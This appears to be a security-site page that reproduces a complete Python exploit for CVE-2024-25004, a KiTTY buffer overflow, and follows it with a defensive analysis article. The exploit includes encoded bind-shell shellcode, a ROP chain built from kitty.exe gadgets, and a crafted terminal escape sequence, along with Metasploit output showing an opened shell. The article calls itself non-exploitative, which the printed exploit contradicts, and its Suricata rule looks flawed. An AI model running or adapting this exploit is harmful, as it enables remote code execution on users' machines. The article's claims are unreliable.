KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
Exploit Author: DEFCESCO Analysis Author: www.bubbleslearn.ir Category: Local Language: Python Published Date: 2024-03-14
# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: CVE-2024-25004
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(windows/shell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
import sys
import os
import struct
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
# windows/shell_bind_tcp - 355 bytes #
# https://metasploit.com/ #
# Encoder: x86/shikata_ga_nai #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
# AutoVerifySession=true #
#-------------------------------------------------------------------------------------#
buf = b""
buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
def shellcode():
sc = b''
sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444
sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444
sc += b'\x29\xD8' # sub eax,ebx
sc += b'\x29\xC4' # sub esp,eax
sc += buf
sc += b'\x90' * (1042-len(sc))
assert len(sc) == 1042
return sc
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953, # POP EBP # RETN [kitty.exe]
0x005405b0, # PUSH ESP; RETN 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9, # POP EBX # RETN [kitty.exe]
0x00000201, # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce, # POP EDX # RETN [kitty.exe]
0x00000040, # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c, # POP ECX # RETN [kitty.exe]
0x004d81d9, # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404, # POP EDI # RETN [kitty.exe]
0x005a2001, # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090, # nop
0x41414141, # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac, # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d #
# Return Address Information: 0x00529720 : {pivot 324 / 0x144} : #
# ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
# ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} #
# Shellcode size at ESP: 1042 bytes #
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'\x90' * 27
nops = b'\x90' * 88
escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
escape_sequence += nops + b'\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()KiTTY 0.76.1.13 — “Start Duplicated Session Username” Buffer Overflow (CVE-2024-25004)
This article provides a technical, yet non-exploitative, analysis of the buffer overflow vulnerability tracked as CVE-2024-25004 in KiTTY ≤ 0.76.1.13. It explains the vulnerability class, attacker impact, practical mitigation and detection guidance, and safe examples for defenders to identify and remediate affected hosts. The write-up intentionally avoids exploit details while giving security teams actionable defensive steps.
Quick summary
| Item | Details |
|---|---|
| Vulnerability | Buffer overflow in KiTTY handling of a "Start Duplicated Session Username" (escape sequence related) |
| CVE | CVE-2024-25004 |
| Affected versions | KiTTY ≤ 0.76.1.13 |
| Attack vector | Locally or remotely triggered via crafted terminal input / session data (escape sequence processing) |
| Impact | Arbitrary code execution / process compromise (high) |
| Remediation | Apply vendor fix or upgrade to patched release; mitigate by restricting untrusted inputs and running principle of least privilege |
What kind of vulnerability is this?
CVE-2024-25004 is a classic memory corruption vulnerability—specifically a buffer overflow—found in KiTTY's handling of certain terminal sequences related to duplicated session username processing. When KiTTY processes specially crafted input sequences, the code that copies or parses the supplied data can exceed allocated buffers, permitting an attacker to corrupt adjacent memory and potentially alter control flow.
Why it matters
- High impact: A successful exploitation can lead to arbitrary code execution in the context of the KiTTY process, enabling system compromise on the host running the vulnerable client.
- Attack surface: Clients that process remote terminal output—such as SSH/Telnet sessions or imported session data—may be exposed if they display or handle untrusted sequences.
- Ease of exploitation: The vulnerability's practical exploitability depends on environment-specific factors (OS protections, mitigations like ASLR/DEP, and process privileges). However, it is classified as high risk given the potential for remote-triggered input to reach the vulnerable code path.
Responsible disclosure and vendor action
Users and administrators should follow responsible disclosure best practices—do not attempt to exploit the issue on production systems. Instead, apply available vendor updates or official mitigations. Consult the KiTTY project release notes and vendor advisories for the fixed version and installation instructions.
Detection and incident response guidance
Indicators of compromise (IoCs) and detection points
- Unexpected crashes of kitty.exe, especially when connecting to remote hosts or loading sessions.
- Unexplained new processes or network listeners spawned from user sessions that run KiTTY.
- Terminal output that contains unusually long control/escape sequences before a crash.
- Presence of unapproved KiTTY versions (≤ 0.76.1.13) on endpoints.
Safe detection examples
Below are defensive code examples that help identify vulnerable binaries and suspicious runtime behavior. These examples do not include exploit code and are safe for defenders to run in production.
1) Python: check KiTTY executable version (using pefile)
import os
import sys
try:
import pefile
except ImportError:
print("Install pefile (pip install pefile) to use this script.")
sys.exit(1)
def get_file_version(path):
pe = pefile.PE(path)
if not hasattr(pe, 'VS_FIXEDFILEINFO'):
return None
vs = pe.VS_FIXEDFILEINFO[0]
major = (vs.FileVersionMS >> 16) & 0xffff
minor = vs.FileVersionMS & 0xffff
build = (vs.FileVersionLS >> 16) & 0xffff
revision = vs.FileVersionLS & 0xffff
return f"{major}.{minor}.{build}.{revision}"
if __name__ == "__main__":
path = r"C:\Program Files\KiTTY\kitty.exe" # adjust path as needed
if not os.path.exists(path):
print("Kitty executable not found at:", path)
sys.exit(1)
print("Kitty version:", get_file_version(path))Explanation: This script uses the pefile library to read the VERSIONINFO resource from a Windows PE executable and prints the file version string. Administrators can run it across endpoints to identify machines with out-of-date KiTTY binaries. Update the path as needed or iterate a list of hosts via your inventory/orchestration tooling.
2) PowerShell: quick local file-property check
$path = "C:\Program Files\KiTTY\kitty.exe"
if (Test-Path $path) {
$ver = (Get-Item $path).VersionInfo.FileVersion
Write-Output "KiTTY version: $ver"
} else {
Write-Output "KiTTY not found at $path"
}Explanation: This PowerShell snippet reads the FileVersion metadata of the KiTTY binary using built-in .NET file properties. Use in endpoint management scripts to inventory versions across many machines.
3) Network/IDS detection (Suricata example)
# Suricata rule (example for defenders): flag unusually long OSC/CSI sequences
alert http any any -> any any (msg:"SURICATA suspicious terminal escape sequence (long OSC)"; flow:established,to_client; content:"ESC]"; depth:2; pcre:"/ESC\][^\x07\x1b]{200,}/"; classtype:attempted-admin; sid:1000001; rev:1;)Explanation: This illustrative Suricata rule seeks long operating-system-control (OSC) sequences (which begin with ESC ]). The rule is intended to detect anomalously long escape/control sequences sent to clients that could indicate attempts to overflow buffers. Tailor thresholds to your environment to balance false positives and negatives. This rule is defensive—do not use it to construct malicious input.
Remediation and mitigation strategies
- Patch immediately: Upgrade to the fixed KiTTY release as published by the project. Patching is the most reliable remediation.
- Restrict untrusted sessions: Avoid opening sessions to untrusted hosts and do not import or open session files from unknown sources.
- Principle of least privilege: Run KiTTY under a limited user account—do not run it as an elevated administrator unless explicitly required.
- App whitelisting: Use application control to ensure only approved KiTTY binaries are executed and to prevent tampered versions from running.
- Runtime protections: Enable OS-level protections (ASLR, DEP, Control Flow Guard where available). These do not replace patches but increase exploitation difficulty.
- Network-level controls: Employ IDS/IPS rules to detect abnormal terminal sequences and monitor for anomalous outbound connections made by user processes.
Configuration hygiene
- Disable any feature that automatically loads or executes session data from untrusted file sources.
- Maintain strict storage and transfer controls for saved sessions and configuration files (treat them as sensitive).
- Document and enforce a patch-management cadence for terminal client software used across the organization.
Post-compromise investigation guidance
- Collect forensic artifacts: process memory dumps of kitty.exe, event logs, and network captures around the time of the crash or suspected compromise.
- Review created processes and scheduled tasks for signs of persistence established by an attacker via the compromised session.
- Search endpoints for unknown binaries, suspicious parent-child process relationships, and unusual listening sockets opened by user processes.
- Rotate credentials that were used in sessions from the potentially affected terminal client, and consider requiring MFA for privileged access where possible.
Additional resources
- KiTTY project and releases: https://github.com/cyd01/KiTTY/
- Official security advisories and release notes from the KiTTY project (check the Releases page for the patched version).
- CVE database entry: CVE-2024-25004 (refer to authoritative CVE records and vendor advisories for the finalized details).
Final notes for defenders
Buffer overflow vulnerabilities in terminal clients are particularly dangerous because they blur the boundary between remote content and local code execution. Prioritize patching, limit exposure to untrusted hosts and session data, and add detection controls to catch anomalous terminal traffic and application behaviors. If you discover suspicious activity, treat it as a potential compromise and follow your incident response playbook.